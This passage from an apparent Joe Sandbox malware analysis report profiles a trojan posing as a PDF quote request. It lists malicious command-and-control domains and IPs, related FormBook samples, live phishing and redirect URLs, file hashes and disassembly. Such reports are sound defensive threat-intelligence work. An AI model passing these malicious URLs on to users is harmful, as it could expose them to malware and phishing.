                                                                                                    http://www.d66dr114gl.bondexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://powerpoint.office.comEMdexplorer.exe, 00000003.00000000.2351958536.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4780167257.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.moocatinght.topexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.backstretch.store/hwu6/www.health-insurance-cake.worldexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nationexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.backstretch.store/hwu6/explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.simo1simo001.clickReferer:explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown

                                                                                                        World Map of Contacted IPs

                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs

                                                                                                        Public IPs

                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        104.21.40.196
                                                                                                        		www.7b5846.onlineUnited States
                                                                                                        		13335CLOUDFLARENETUStrue
                                                                                                        164.92.166.75
                                                                                                        		www.simo1simo001.clickUnited States
                                                                                                        		46930ASN-DPSDUStrue
                                                                                                        104.21.80.156
                                                                                                        		www.gequiltdesins.shopUnited States
                                                                                                        		13335CLOUDFLARENETUStrue
                                                                                                        172.104.236.215
                                                                                                        		ilsgroup.netUnited States
                                                                                                        		63949LINODE-APLinodeLLCUStrue
                                                                                                        217.21.91.24
                                                                                                        		maheshg.xyzUnited Kingdom
                                                                                                        		12491IPPLANET-ASILtrue

                                                                                                        General Information

                                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                                        Analysis ID:1589987
                                                                                                        Start date and time:2025-01-13 13:04:10 +01:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 11m 50s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Number of analysed new started processes analysed:15
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:1
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Sample name:RFQ PC25-1301 Product Specifications_PDF.exe
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.evad.winEXE@10/1@12/5
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 100%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 100%
                                                                                                        • Number of executed functions: 43
                                                                                                        • Number of non-executed functions: 298
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .exe
                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                        Warnings

                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                        • Excluded IPs from analysis (whitelisted): 20.190.160.22, 20.103.156.88, 172.202.163.200, 2.22.50.227, 150.171.29.10, 20.223.35.26, 2.23.227.208, 2.23.242.162
                                                                                                        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, login.live.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                        • Report size getting too big, too many NtOpenKey calls found.
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                        • VT rate limit hit for: RFQ PC25-1301 Product Specifications_PDF.exe

                                                                                                        Simulations

                                                                                                        Behavior and APIs

                                                                                                        TimeTypeDescription
                                                                                                        07:05:33API Interceptor6148353x Sleep call for process: explorer.exe modified
                                                                                                        07:06:07API Interceptor5628362x Sleep call for process: help.exe modified

                                                                                                        Joe Sandbox View / Context

                                                                                                        IPs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        104.21.40.196file.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.7b5846.online/hwu6/?adoHn6=uXc87hFXpvg4&Rl7=YeF1y3FAQJcqH3tuWfJk7b1+zf3Y35LdyPqCzn7ElcW/f++Fd6XCLGgtd1rezRCsTdps
                                                                                                        104.21.80.156https://1drv.ms/o/s!BFRjM-vQxGYFhElDOX-pd0RkvatP?e=Rp2e0wqCfEOklCep72qfVw&at=9&d=DwMFAwGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                          https://1drv.ms/o/s!BGRETuswS7_fgViX-v5t7I-xUWue?e=X8JwiRbJW0uAIWm_GKIQWw&at=9Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                            https://stearncommutity.ru/profiles/666061199495928728Get hashmaliciousUnknownBrowse

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              huayang.302.gn301.xyz2rI5YEg7uo.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 107.148.177.200
                                                                                                              Bill Of Lading_MEDUVB935991.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 107.148.177.200
                                                                                                              AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 172.247.44.157
                                                                                                              PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 107.148.177.200
                                                                                                              Electronic Order.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 154.222.238.52
                                                                                                              Inquiry PR#27957.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 154.12.34.252
                                                                                                              ssl1.prod.systemdragon.comkHslwiV2w6.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 104.18.188.223
                                                                                                              AB2hQJZ77ipdWem.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                              • 104.18.187.223
                                                                                                              Orden de compra 0307AR24.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 104.18.187.223
                                                                                                              order-payment094093.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                              • 104.18.188.223
                                                                                                              SecuriteInfo.com.FileRepMalware.16340.31219.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                              • 104.17.158.1
                                                                                                              IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 104.17.157.1
                                                                                                              wLlREXsA9M.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                              • 104.17.157.1
                                                                                                              sOjxIU25DP.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                              • 104.17.157.1
                                                                                                              hi38VYWujz.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                              • 104.17.158.1
                                                                                                              Payment_document.docx.docGet hashmaliciousFormBookBrowse
                                                                                                              • 104.17.158.1
                                                                                                              www.7b5846.onlinefile.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 104.21.40.196

                                                                                                              ASNs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              CLOUDFLARENETUSQUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.112.1
                                                                                                              Remittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.32.1
                                                                                                              SOA.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 104.21.112.1
                                                                                                              https://shortener.kountryboyzbailbonds.com/orVbdaZDUTFihPy?https://go.microsoft.com/ref=?ONSKE6784f8047cd90___store=ot&url=ONSKE6784f8047cd90&utm_source=follow-up-email&utm_medium=email&utm_campaign=abandoned%20helpful%20linkGet hashmaliciousUnknownBrowse
                                                                                                              • 104.19.132.76
                                                                                                              PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.32.1
                                                                                                              https://smartbooking.ma/Get hashmaliciousUnknownBrowse
                                                                                                              • 188.114.97.3
                                                                                                              FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.80.1
                                                                                                              https://connexion-pro.support/adobe/s/assets/Get hashmaliciousUnknownBrowse
                                                                                                              • 104.21.11.138
                                                                                                              rRef6010273.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 172.67.74.152
                                                                                                              g5.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 1.1.1.1
                                                                                                              LINODE-APLinodeLLCUSMACHINE SPECIFICATIONS.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 45.56.79.23
                                                                                                              http://premiumsub.hosted.phplist.com/Get hashmaliciousUnknownBrowse
                                                                                                              • 45.33.29.14
                                                                                                              1N6ZpdYnU3.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 178.79.184.196
                                                                                                              http://www.jadavisinjurylawyers.com/Get hashmaliciousUnknownBrowse
                                                                                                              • 173.255.204.62
                                                                                                              boatnet.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 104.237.135.249
                                                                                                              boatnet.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 172.105.120.101
                                                                                                              QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 45.33.2.79
                                                                                                              QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                                              • 198.58.118.167
                                                                                                              Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                                                              • 198.58.122.131
                                                                                                              QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 45.33.23.183
                                                                                                              CLOUDFLARENETUSQUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.112.1
                                                                                                              Remittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.32.1
                                                                                                              SOA.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 104.21.112.1
                                                                                                              https://shortener.kountryboyzbailbonds.com/orVbdaZDUTFihPy?https://go.microsoft.com/ref=?ONSKE6784f8047cd90___store=ot&url=ONSKE6784f8047cd90&utm_source=follow-up-email&utm_medium=email&utm_campaign=abandoned%20helpful%20linkGet hashmaliciousUnknownBrowse
                                                                                                              • 104.19.132.76
                                                                                                              PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.32.1
                                                                                                              https://smartbooking.ma/Get hashmaliciousUnknownBrowse
                                                                                                              • 188.114.97.3
                                                                                                              FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.80.1
                                                                                                              https://connexion-pro.support/adobe/s/assets/Get hashmaliciousUnknownBrowse
                                                                                                              • 104.21.11.138
                                                                                                              rRef6010273.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 172.67.74.152
                                                                                                              g5.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 1.1.1.1
                                                                                                              ASN-DPSDUSFantazy.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 164.92.178.86
                                                                                                              x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                              • 164.94.212.231
                                                                                                              https://webservice.ucampaign.unear.net/UmailTracking/t.aspx?p=64620006&c=MTI2NjMxOA==&up=46435316&e=jlim@vvblawyers.com&l=MTczODQ=&i=1126&u=aHR0cHM6Ly9zcGhleGFtcy5jb20vLndlbGwta25vdy8/MHM1N2RiPU1UTW1NVE1tTVRNbU1UTW1RakVtUmpRbWIySnhkRWN6SmtRMEprMTFiSGR5VkdoSGVVdFpMaTQ1U2pOWU5sSnlhbVk2Y2tZMEpqTXpKblY1Wm5VdWIyWmxaV3BwTXpNbVJUUW1kSFJpYldReE15WnZZbkYwUkRRbVFqRW1SalFtYlc1MWFVY3pKa1EwSmtJeEprWTBKbnBsY0dOSE15WkVOQ1pDTVNaR05DWjZaWEJqUkRRbVFqRW1SalFtWldKbWFVY3pKa1EwSmtJeEprWTBKbVp0ZW5WMFJ6TW1SRFFtTVRNbU1UTW1NVE1tTVRNbVFqRW1SVGdtTVRNbU1UTW1NVE1tTVRNbU1UTW1NVE1tTVRNbU1UTW1RakVtUXpRbWIyWmxaV3BwTVRNbVFqUW1lblZxYldwamFuUnFkekV6SmpFekpqRXpKakV6SmpFekpqRXpKakV6SmpFekpqRXpKakV6SmpFekpqRXpKa0l4SmtNMEptWjFhbWw0TVRNbVFqUW1jM0J0Y0dReE15WXhNeVl4TXlZeE15WXhNeVl4TXlZeE15WXhNeVl4TXlZeE15WXhNeVl4TXlaQ01TWkRPQ1l4TXlaMWVXWjFMbTltWldWcWFTOHhNeVl4TXlZeE15WXhNeVl4TXlZeE15WXhNeVl4TXlaQ01TWkdOQ1ptYlhwMWRFUTBKakV6SmpFekpqRXpKakV6SmtJeEprWTBKbVp0ZFdwMVJ6TW1SRFFtWm01d1NVWTBKbVp0ZFdwMVJEUW1NVE1tTVRNbU1UTW1NVE1tUWpFbVJ6TW1LekV6Sm1aek1UTW1aV1ZpTVRNbVJUUW1SVFFtUlRRbVJUUW1SVFFtUlRRbVJEUW1NVE1tSzBjekpqRXpKakV6SmtZMEpqTXpKa1UwSmpFelkyczJSR054UjFoamIwTkdaWHRYU0dWemVtZHNkSHBtYVdkdWMydGxhVFF6SmtjekptWnpSek1tWldSSE15WjRjRzlzTG0xdFpuZ3ZSek1tYUhOd0wyWnRZbTl3YW50aWIzTm1kVzlxYjJadVlrY3pKa2N6SmtJMEpuUnhkWFZwUlRRbWJYTjJRelFtTXpNekprVTBKblZ2Wm5WdmNHUXhNeVl6TXlacGRHWnpaMlp6TXpNbVJUUW1kMnAyY21ZdWNYVjFhVEV6Sm1KMVptNUVOQ1l4TXlZeE15WXhNeVl4TXlaQ01TWkdOQ1l6TXlZNUxrZFZWak16SmtVMEpuVm1kSE5pYVdReE15WmlkV1p1UkRRbU1UTW1NVE1tTVRNbU1UTW1RakVtUmpRbVpXSm1hVVEwSmtJeEprWTBKbTF1ZFdsRU5DWkNNU1pHTkNadlluRjBSek1tUkRRbVpHczNhRnBXUkRRbWRIczFUVVUwSmt4WWJYZ3hUMUZuWkZoUVdYTjdOWGRIT1h0UlJUWW1RMDlHTkNZek15WjFlV1oxTG05bVpXVnFhVE16SmtVMEpuUjBZbTFrTVRNbWIySnhkRVEwSmtJeEpnPT0=Get hashmaliciousHTMLPhisherBrowse
                                                                                                              • 164.92.188.247
                                                                                                              https://google.sk/url?q=gcwogJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/fvh1/emVnZXJ0dmFuZGVybGluZ2VuQHJveWFsZmxvcmFob2xsYW5kLmNvbQ==%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9AGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 164.92.191.86
                                                                                                              SBO Catch up call pf.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 164.92.191.86
                                                                                                              https://google.dz/url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1Get hashmaliciousHTMLPhisherBrowse
                                                                                                              • 164.92.191.86
                                                                                                              https://aaanycyytg7pagn3.mylandingpages.co/pdffile/Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                                                              • 164.92.173.174
                                                                                                              https://google.dz/url?q=qmrbdJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9AGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 164.92.191.86
                                                                                                              http://fdgfhvcfdgfhhjh.gharelokhana.com/common/loginGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 164.92.191.86
                                                                                                              https://google.dz/url?q=lbjaqJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fhandlingservice.com.br%2fyoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82Get hashmaliciousUnknownBrowse
                                                                                                              • 164.92.191.86

                                                                                                              JA3 Fingerprints

                                                                                                              No context

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Temp\juvenilely

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):189440
                                                                                                              Entropy (8bit):7.866592094662498
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:+UlOjJSJmfkhT/AdHmwHDEXqXDX6MjWnwjAaTEh8beIiKI/r3yX9eY4pN2ljvRT7:rOjJSJmfmE55DQqD6MjawjAaQ+CDZWYO
                                                                                                              MD5:6057FF19BA412F717BB4EE8F31CDD910
                                                                                                              SHA1:B496DF49941FFD69B9EEFA05BB0A41F04CBE0A1F
                                                                                                              SHA-256:CD28D8DF13068C00E4F468FF7AEBBEDF8701160F3E731B51AA4C7FD219B802B9
                                                                                                              SHA-512:4F079CD9D19E1F518F7FB16401218D570195DD2ACFA7C49F68664988CD2328E7FAA82F172E9D86D9C083B99A3682549C48A72856EAC9F029479B1F4EE3DB632A
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:..}..3ZSD...<...}.FG....0R...1G5ERI6AUFDV8B53ZSDO1G5ERI6AUF.V8B;,.]D.8...S..`..-%.2G\=!%".$T+<&Ba7#d$M,.Z4s..bgX*6,.LXL`V8B53ZS7^...5...1..s&c.m5..5?j.mC...1...P...C...&R/.5..6AUFDV8BevZS.N0GQ..6AUFDV8B.3XRON;G5.PI6AUFDV8B..[SD_1G5.PI6A.FDF8B51ZSAO0G5ERI3ATFDV8B5.XSDM1G5ERI4A..DV(B5#ZSDO!G5URI6AUFTV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G.171BAUF.:B5#ZSD.3G5URI6AUFDV8B53ZSdO1'5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUFDV8B53ZSDO1G5ERI6AUF

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):6.9941522367683335
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:RFQ PC25-1301 Product Specifications_PDF.exe
                                                                                                              File size:1'790'464 bytes
                                                                                                              MD5:f1cb41be3365b899a74d919df902fc08
                                                                                                              SHA1:befff58e08b3adc2058f51c884067e59708e17d3
                                                                                                              SHA256:d59aedcde68dc8275a3ad53be28c1588790b2e5da2258a66d4492c5a7c67a7c1
                                                                                                              SHA512:17ebb6eb1c3273dd3326267fe0633dbedf737ff8a90282e92d91141a1f6ae81037afe3b42f0c3e0e20301045168bc0be81aa26d3d11bce826c0d5b5d1413adc8
                                                                                                              SSDEEP:24576:KqDEvCTbMWu7rQYlBQcBiT6rprG8aFhKG+mre6oRTOtTOUIClacTL:KTvC/MTQYxsWR7aFhKG+mrJ+OtNIU
                                                                                                              TLSH:9385D0023390CEA2FF5697324FA9F752577C6E269133D24F23942A79BE709A4013E653
                                                                                                              File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                                                                              File Icon

                                                                                                              Icon Hash:17394d716d69338e

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x420577
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x6784B0F8 [Mon Jan 13 06:21:44 2025 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:5
                                                                                                              OS Version Minor:1
                                                                                                              File Version Major:5
                                                                                                              File Version Minor:1
                                                                                                              Subsystem Version Major:5
                                                                                                              Subsystem Version Minor:1
                                                                                                              Import Hash:948cc502fe9226992dce9417f952fce3

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              call 00007F66CD0A4AE3h
                                                                                                              jmp 00007F66CD0A43EFh
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              push esi
                                                                                                              push dword ptr [ebp+08h]
                                                                                                              mov esi, ecx
                                                                                                              call 00007F66CD0A45CDh
                                                                                                              mov dword ptr [esi], 0049FDF0h
                                                                                                              mov eax, esi
                                                                                                              pop esi
                                                                                                              pop ebp
                                                                                                              retn 0004h
                                                                                                              and dword ptr [ecx+04h], 00000000h
                                                                                                              mov eax, ecx
                                                                                                              and dword ptr [ecx+08h], 00000000h
                                                                                                              mov dword ptr [ecx+04h], 0049FDF8h
                                                                                                              mov dword ptr [ecx], 0049FDF0h
                                                                                                              ret
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              push esi
                                                                                                              push dword ptr [ebp+08h]
                                                                                                              mov esi, ecx
                                                                                                              call 00007F66CD0A459Ah
                                                                                                              mov dword ptr [esi], 0049FE0Ch
                                                                                                              mov eax, esi
                                                                                                              pop esi
                                                                                                              pop ebp
                                                                                                              retn 0004h
                                                                                                              and dword ptr [ecx+04h], 00000000h
                                                                                                              mov eax, ecx
                                                                                                              and dword ptr [ecx+08h], 00000000h
                                                                                                              mov dword ptr [ecx+04h], 0049FE14h
                                                                                                              mov dword ptr [ecx], 0049FE0Ch
                                                                                                              ret
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              push esi
                                                                                                              mov esi, ecx
                                                                                                              lea eax, dword ptr [esi+04h]
                                                                                                              mov dword ptr [esi], 0049FDD0h
                                                                                                              and dword ptr [eax], 00000000h
                                                                                                              and dword ptr [eax+04h], 00000000h
                                                                                                              push eax
                                                                                                              mov eax, dword ptr [ebp+08h]
                                                                                                              add eax, 04h
                                                                                                              push eax
                                                                                                              call 00007F66CD0A718Dh
                                                                                                              pop ecx
                                                                                                              pop ecx
                                                                                                              mov eax, esi
                                                                                                              pop esi
                                                                                                              pop ebp
                                                                                                              retn 0004h
                                                                                                              lea eax, dword ptr [ecx+04h]
                                                                                                              mov dword ptr [ecx], 0049FDD0h
                                                                                                              push eax
                                                                                                              call 00007F66CD0A71D8h
                                                                                                              pop ecx
                                                                                                              ret
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              push esi
                                                                                                              mov esi, ecx
                                                                                                              lea eax, dword ptr [esi+04h]
                                                                                                              mov dword ptr [esi], 0049FDD0h
                                                                                                              push eax
                                                                                                              call 00007F66CD0A71C1h
                                                                                                              test byte ptr [ebp+08h], 00000001h
                                                                                                              pop ecx

                                                                                                              Rich Headers

                                                                                                              Programming Language:
                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                              • [IMP] VS2008 SP1 build 30729

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000xde780.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1b30000x7594.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

